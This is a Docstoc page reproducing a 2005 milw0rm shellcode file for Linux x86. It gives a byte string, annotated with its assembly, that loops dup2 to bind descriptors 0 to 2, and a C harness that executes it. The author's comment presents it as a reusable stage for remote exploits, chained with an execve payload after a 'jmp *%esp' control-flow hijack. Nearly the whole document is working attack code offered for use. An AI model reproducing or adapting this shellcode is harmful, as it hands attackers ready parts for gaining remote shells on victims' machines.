Docstoc

linuxx86 dup20_0

Document Sample
linuxx86 dup20_0 Powered By Docstoc
					                                                               linuxx86 dup20,0     Page 1/1
  1    /* dup2_loop−core.c by Charles Stevenson <core@bokeoa.com>
  2      *
  3      * I made this as a chunk you can paste in to make modular remote
  4      * exploits. I usually combine this with an execve as the second
  5      * stage of a read() jmp *%esp
  6      */
  7    char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */
  8    "\x31\xc9"                       // xor    %ecx,%ecx
  9    "\x56"                           // push   %esi
  10   "\x5b"                           // pop    %ebx
  11   // loop:
  12   "\x6a\x3f"                       // push   $0x3f
  13   "\x58"                           // pop    %eax
  14   "\xcd\x80"                       // int    $0x80
  15   "\x41"                           // inc    %ecx
  16   "\x80\xf9\x03"                   // cmp    $0x3,%cl
  17   "\x75\xf5"                       // jne    80483e8 <loop>
  18   ;
  19
  20   int main(void)
  21   {
  22     void (*shell)() = (void *)&hellcode;
  23     printf("%d byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n",
  24            strlen(hellcode));
  25     shell();
  26     return 0;
  27   }
  28
  29   // milw0rm.com [2005−11−09]




dup2(0,2)                                                                             dup2(0,1)

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:23
posted:5/24/2010
language:English
pages:1